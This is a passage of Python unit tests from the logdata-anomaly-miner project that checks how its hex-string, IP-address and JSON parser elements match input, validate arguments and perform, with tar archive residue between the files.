HexStringModelElement(self.id_) while ord(char2) < ord(b"\x7F"): data = char2 + char1 match_context = DummyMatchContext(data) match_element = hex_string_model_element.get_match_element(self.path, match_context) if char2 in allowed_chars: if char1 in allowed_chars: match_context.match_string = bytes.fromhex(data.decode()) # match_context.match_string check has to be skipped. match_context.match_data = data[len(match_context.match_string):] # match_context.match_data has to be rewritten. self.compare_match_results( data, match_element, match_context, self.id_, self.path, bytes.fromhex(data.decode()), data, None) self.assertEqual(match_element.get_match_object(), data) else: match_context.match_string = bytes.fromhex("0" + char2.decode()) # match_context.match_string check has to be skipped. self.compare_match_results( data, match_element, match_context, self.id_, self.path, bytes.fromhex("0" + char2.decode()), char2, None) self.assertEqual(match_element.get_match_object(), char2) else: self.compare_no_match_results(data, match_element, match_context) if ord(char1) == 0x7f: char1 = b"\x00" char2 = bytes(chr(ord(char2) + 1), "utf-8") else: char1 = bytes(chr(ord(char1) + 1), "utf-8") allowed_chars = [b"0", b"1", b"2", b"3", b"4", b"5", b"6", b"7", b"8", b"9", b"A", b"B", b"C", b"D", b"E", b"F"] char1 = b"\x00" char2 = b"\x00" hex_string_model_element = HexStringModelElement(self.id_, True) while ord(char2) < ord(b"\x7F"): data = char2 + char1 match_context = DummyMatchContext(data) match_element = hex_string_model_element.get_match_element(self.path, match_context) if char2 in allowed_chars: if char1 in allowed_chars: self.assertEqual(match_element.get_match_object(), data) else: self.assertEqual(match_element.get_match_object(), char2) else: self.compare_no_match_results(data, match_element, match_context) if ord(char1) == 0x7f: char1 = b"\x00" char2 = bytes(chr(ord(char2) + 1), "utf-8") else: char1 = bytes(chr(ord(char1) + 1), "utf-8") def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" data = b"" match_context = DummyMatchContext(data) hex_me = HexStringModelElement(self.id_) match_element = hex_me.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, HexStringModelElement, "") # empty element_id self.assertRaises(TypeError, HexStringModelElement, None) # None element_id self.assertRaises(TypeError, HexStringModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, HexStringModelElement, set()) # empty set element_id is not allowed def test4upper_case_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, HexStringModelElement, self.id_, "path") # string upper_case self.assertRaises(TypeError, HexStringModelElement, self.id_, None) # None upper_case self.assertRaises(TypeError, HexStringModelElement, self.id_, b"path") # bytes upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, 123) # integer upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, 123.22) # float upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, {"id": "path"}) # dict upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, ["path"]) # list upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, []) # empty list upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, ()) # empty tuple upper_case is not allowed self.assertRaises(TypeError, HexStringModelElement, self.id_, set()) # empty set upper_case is not allowed def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = HexStringModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test6performance(self): """Test the performance of the implementation. Comment this test out in normal cases.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.HexStringModelElement import HexStringModelElement times = 100000 """ string_short_setup = """ hex_string = b"100" """ string_long_setup = """ hex_string = b"23999EA30A3430DA" """ end_setup = """ dummy_match_context = DummyMatchContext(hex_string) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] hex_string_dme = HexStringModelElement("s0") def run(): match_context = dummy_match_context_list.pop(0) hex_string_dme.get_match_element("hex", match_context) """ _setup_short = import_setup + string_short_setup + end_setup _setup_long = import_setup + string_long_setup + end_setup # import timeit # times = 100000 # print("Every hex string is run 100.000 times.") # t = timeit.timeit(setup=_setup_short, stmt="run()", number=times) # print("Hex string 100: ", t) # t = timeit.timeit(setup=_setup_long, stmt="run()", number=times) # print("Hex string 23999EA30A3430DA: ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/IpAddressDataModelElementTest.py000066400000000000000000000332731500476301700316100ustar00rootroot00000000000000import unittest from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext class IpAddressDataModelElementTest(TestBase): """Unittests for the IpAddressDataModelElement.""" id_ = "ip" path = "path" def test1get_match_element_valid_ipv4_match(self): """ This test case checks the functionality by parsing a real IP-addresses. The boundary values for IP-addresses is 0.0.0.0 - 255.255.255.255 The numerical representation of the ip address was calculated with the help of http://www.aboutmyip.com/AboutMyXApp/IP2Integer.jsp. """ ip_addr_dme = IpAddressDataModelElement(self.id_) data = b"192.168.0.155 followed by some text" value = b"192.168.0.155" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 3232235675, None) data = b"0.0.0.0." value = b"0.0.0.0" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 0, None) data = b"255.255.255.255." value = b"255.255.255.255" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 4294967295, None) data = b"192.168.0.155.22 followed by some text" value = b"192.168.0.155" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, 3232235675, None) def test2get_match_element_no_match_ipv4(self): """ Test if wrong formats are determined and boundary values are checked. Also check if hexadecimal ip addresses are not parsed as these are not allowed. Test if ip addresses are found, even if they are followed by other numbers. """ ip_addr_dme = IpAddressDataModelElement(self.id_) data = b"192. 168.0.155 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"256.168.0.155 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"\xc0\xa8\x00\x9b" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_valid_ipv6_match(self): """ This test case checks the functionality by parsing a real IP-addresses. The numerical representation of the ip address was calculated with the help of https://www.ipaddressguide.com/ipv6-to-decimal. """ ip_addr_dme = IpAddressDataModelElement(self.id_, True) data = b"2001:4860:4860::8888 followed by some text" value = b"2001:4860:4860::8888" number = 42541956123769884636017138956568135816 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # full form of IPv6 data = b"fe80:0000:0000:0000:0204:61ff:fe9d:f156." value = b"fe80:0000:0000:0000:0204:61ff:fe9d:f156" number = 338288524927261089654164245681446711638 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # drop leading zeroes data = b"fe80:0:0:0:204:61ff:fe9d:f156." value = b"fe80:0:0:0:204:61ff:fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # collapse multiple zeroes to :: in the IPv6 address data = b"fe80::204:61ff:fe9d:f156 followed by some text" value = b"fe80::204:61ff:fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # localhost data = b"::1 followed by some text" value = b"::1" number = 1 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # link-local prefix data = b"fe80:: followed by some text" value = b"fe80::" number = 338288524927261089654018896841347694592 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) # global unicast prefix data = b"2001:: followed by some text" value = b"2001::" number = 42540488161975842760550356425300246528 match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, number, None) def test4get_match_element_no_match_ipv6(self): """Test if wrong formats are determined and boundary values are checked.""" ip_addr_dme = IpAddressDataModelElement(self.id_, True) # IPv4 dotted quad at the end data = b"fe80:0000:0000:0000:0204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # drop leading zeroes, IPv4 dotted quad at the end data = b"fe80:0:0:0:0204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # dotted quad at the end, multiple zeroes collapsed data = b"fe80::204:61ff:254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # multiple :: in the IPv6 address data = b"fe80::204:61ff::fe9d:f156" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # IPv4 address with ipv6 being True data = b"254.157.241.86" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # g in ip address data = b"2001:4860:48g0::8888 followed by some text" match_context = DummyMatchContext(data) match_element = ip_addr_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test5element_id_input_validation(self): """Check if element_id is validated.""" self.assertRaises(ValueError, IpAddressDataModelElement, "") # empty element_id self.assertRaises(TypeError, IpAddressDataModelElement, None) # None element_id self.assertRaises(TypeError, IpAddressDataModelElement, b"path") # bytes element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, True) # boolean element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, 123) # integer element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, 123.22) # float element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, {"id": "path"}) # dict element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, ["path"]) # list element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, []) # empty list element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, ()) # empty tuple element_id is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, set()) # empty set element_id is not allowed def test6ipv6_input_validation(self): """Check if ipv6 is validated.""" self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, "path") # string ipv6 self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, None) # None ipv6 self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, b"path") # bytes ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, 123) # integer ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, 123.22) # float ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, {"id": "path"}) # dict ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, ["path"]) # list ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, []) # empty list ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, ()) # empty tuple ipv6 is not allowed self.assertRaises(TypeError, IpAddressDataModelElement, self.id_, set()) # empty set ipv6 is not allowed def test7get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = IpAddressDataModelElement(self.id_) data = b"abcdefghijklmnopqrstuvwxyz.!?" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) def test8performance(self): """Test the performance of the implementation.""" import_setup = """ import copy from unit.TestBase import DummyMatchContext from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement times = 300000 """ ip_192_setup = """ ip = b"192.168.0.155" dme = IpAddressDataModelElement("s0") """ ip_0_setup = """ ip = b"0.0.0.0" dme = IpAddressDataModelElement("s0") """ ip_255_setup = """ ip = b"255.255.255.255" dme = IpAddressDataModelElement("s0") """ end_setup = """ dummy_match_context = DummyMatchContext(ip) dummy_match_context_list = [copy.deepcopy(dummy_match_context) for _ in range(times)] def run(): match_context = dummy_match_context_list.pop(0) dme.get_match_element("match", match_context) """ _setup192 = import_setup + ip_192_setup + end_setup _setup0 = import_setup + ip_0_setup + end_setup _setup255 = import_setup + ip_255_setup + end_setup # import timeit # times = 300000 # print() # print("192.168.0.155 is run 300.000 times.") # t = timeit.timeit(setup=_setup192, stmt="run()", number=times) # print("time: ", t) # print() # print("0.0.0.0 is run 300.000 times.") # t = timeit.timeit(setup=_setup0, stmt="run()", number=times) # print("time: ", t) # print() # print("255.255.255.255 is run 300.000 times.") # t = timeit.timeit(setup=_setup255, stmt="run()", number=times) # print("time: ", t) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/parsing/JsonModelElementTest.py000066400000000000000000001553321500476301700300520ustar00rootroot00000000000000import copy import unittest import json from aminer.parsing.JsonModelElement import JsonModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement, DummyFirstMatchModelElement class JsonModelElementTest(TestBase): """Unittests for the JsonModelElement.""" id_ = "json" path = "path" single_line_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {' \ b'"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}, ' \ b'{"value": "Undo", "onclick": "UndoDoc()", "clickable": true}]}}}' single_line_with_optional_key_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick":' \ b' "CreateNewDoc()", "clickable": false}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": ' \ b'"Close", "onclick": "CloseDoc()", "clickable": false}]}}}' single_line_missing_key_json = b'{"menu": {"id": "file", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {' \ b'"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}]}}}' single_line_object_instead_of_array = b'{"menu": {"id": "file", "popup": {"menuitem": {"value": "New", "onclick": "CreateNewDoc()"}}}}' single_line_invalid_json = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNew' \ b'Doc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"' single_line_no_match_json = b'{"menu": {"id": "NoMatch", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "Create' \ b'NewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}]}}}' single_line_different_order_with_optional_key_json = \ b'{"menu": {"value": "File","popup": {"menuitem": [{"clickable": false, "value": "New", "onclick": "CreateNewDoc()"}, {' \ b'"onclick": "OpenDoc()", "value": "Open"}, {"value": "Close", "onclick": "CloseDoc()", "clickable": false}]}, "id": "file"}}' single_line_json_array = b'{"menu": {"id": "file", "value": "File", "popup": ["value", "value", "value"]}}' single_line_escaped_json = br'{"a": "\x2d"}' single_line_empty_array = b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": []}}}' single_line_multiple_menuitems = \ b'{"menu": {"id": "file", "value": "File", "popup": {"menuitem": [{"value": "New", "onclick": "CreateNewDoc()"}, {"value": ' \ b'"Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"}, , ]}}}' multi_line_json = b"""{ "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ {"value": "New", "onclick": "CreateNewDoc()"}, {"value": "Open", "onclick": "OpenDoc()"}, {"value": "Close", "onclick": "CloseDoc()"} ] } } }""" everything_new_line_json = b"""{ "menu": { "id": "file", "value": "File", "popup": { "menuitem": [ { "value": "New", "onclick": "CreateNewDoc()" }, { "value": "Open", "onclick": "OpenDoc()" }, { "value": "Close", "onclick": "CloseDoc()" } ] } } }""" array_of_arrays = b'{"a": [["abc", "abc", "abc"], ["abc", "abc"], ["abc"]]}' key_parser_dict = {"menu": { "id": DummyFixedDataModelElement("id", b"file"), "value": DummyFixedDataModelElement("value", b"File"), "popup": { "menuitem": [{ "value": DummyFirstMatchModelElement("buttonNames", [ DummyFixedDataModelElement("new", b"New"), DummyFixedDataModelElement("open", b"Open"), DummyFixedDataModelElement("close", b"Close")]), "onclick": DummyFirstMatchModelElement("buttonOnclick", [ DummyFixedDataModelElement("create_new_doc", b"CreateNewDoc()"), DummyFixedDataModelElement("open_doc", b"OpenDoc()"), DummyFixedDataModelElement("close_doc", b"CloseDoc()")]), "optional_key_clickable": DummyFirstMatchModelElement("clickable", [ DummyFixedDataModelElement("true", b"true"), DummyFixedDataModelElement("false", b"false")]) }, { "value": DummyFirstMatchModelElement("buttonNames", [DummyFixedDataModelElement("undo", b"Undo")]), "onclick": DummyFirstMatchModelElement("buttonOnclick", [DummyFixedDataModelElement("undo_doc", b"UndoDoc()")]), "clickable": DummyFirstMatchModelElement("clickable", [ DummyFixedDataModelElement("true", b"true"), DummyFixedDataModelElement("false", b"false")]) }] }}} key_parser_dict_allow_all = {"menu": { "id": DummyFixedDataModelElement("id", b"file"), "value": DummyFixedDataModelElement("value", b"File"), "popup": "ALLOW_ALL" }} key_parser_dict_array = {"menu": { "id": DummyFixedDataModelElement("id", b"file"), "value": DummyFixedDataModelElement("value", b"File"), "popup": [ DummyFixedDataModelElement("value", b"value") ] }} key_parser_dict_escaped = {"a": DummyFixedDataModelElement("id", b"-")} empty_key_parser_dict = {"optional_key_key": DummyFixedDataModelElement("key", b"value")} key_parser_dict_allow_all_fields = {"menu": { "id": DummyFixedDataModelElement("id", b"file") }} key_parser_dict_array_of_arrays = {"a": [[DummyFixedDataModelElement("abc", b"abc")]]} key_parser_dict_newline_in_string = {"a": AnyByteDataModelElement("id")} key_parser_dict_nested_optional = {"optional_key_a": { "optional_key_b": DummyFixedDataModelElement("id", b"file") }} def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict) data = self.single_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.multi_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.everything_new_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # Test if keys differently ordered than in the key_parser_dict are parsed properly. data = self.single_line_different_order_with_optional_key_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.single_line_empty_array value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all) data = self.single_line_different_order_with_optional_key_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_array) data = self.single_line_json_array value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_escaped) data = self.single_line_escaped_json.decode("unicode-escape").encode() value = json.loads(data) match_context = DummyMatchContext(self.single_line_escaped_json) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_array_of_arrays) data = self.array_of_arrays value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.key_parser_dict_newline_in_string) data = b'{"a": "\n"}' value = json.loads(data.replace(b"\n", b"\\n")) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string.replace(b"\n", b"\\n"))).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test2get_match_element_with_optional_key(self): """Validate optional keys with the optional_key_prefix.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict) data = self.single_line_with_optional_key_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b"{}" value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(data)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b'{"key": "value"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(data)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) json_model_element = JsonModelElement(self.id_, self.empty_key_parser_dict) data = b'{"key": "another not matching value"}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) # nested optional keys json_model_element = JsonModelElement(self.id_, self.key_parser_dict_nested_optional) data = b'{"a": {"b": "file"}}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(data)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(data)).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = b'{"a": {"b": "file1"}}' match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) def test3get_match_element_with_allow_all(self): """Test a simplified key_parser_dict with ALLOW_ALL.""" json_model_element = JsonModelElement(self.id_, self.key_parser_dict_allow_all) data = self.single_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.multi_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) data = self.everything_new_line_json value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(value).encode() match_context.match_data = data[len(match_context.match_string):] self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) def test4get_match_element_with_nullable_values(self): """Test if nullable values are working as intended.""" # test functionality with objects key_parser_dict = {"+a": DummyFixedDataModelElement("a", b"a")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data_null = b'{"a": null}' data_empty = b"{}" data = b'{"a": "a"}' data_object_null = b'{"a": {"b": null}}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test with null value key_parser_dict = {"+a": DummyFixedDataModelElement("a", b"null")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"a": "null"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) value = json.loads(data_null) match_context = DummyMatchContext(data_null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data_null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test with null key key_parser_dict = {"+null": DummyFixedDataModelElement("a", b"null")} json_model_element = JsonModelElement(self.id_, key_parser_dict) data = b'{"null": "null"}' value = json.loads(data) match_context = DummyMatchContext(data) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( data, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) null = b'{"null": null}' value = json.loads(null) match_context = DummyMatchContext(null) match_element = json_model_element.get_match_element(self.path, match_context) match_context.match_string = str(json.loads(match_context.match_string)).encode() self.compare_match_results( null, match_element, match_context, self.id_, self.path, str(value).encode(), value, match_element.children) # test functionality with arrays key_parser_dict = {"+a": 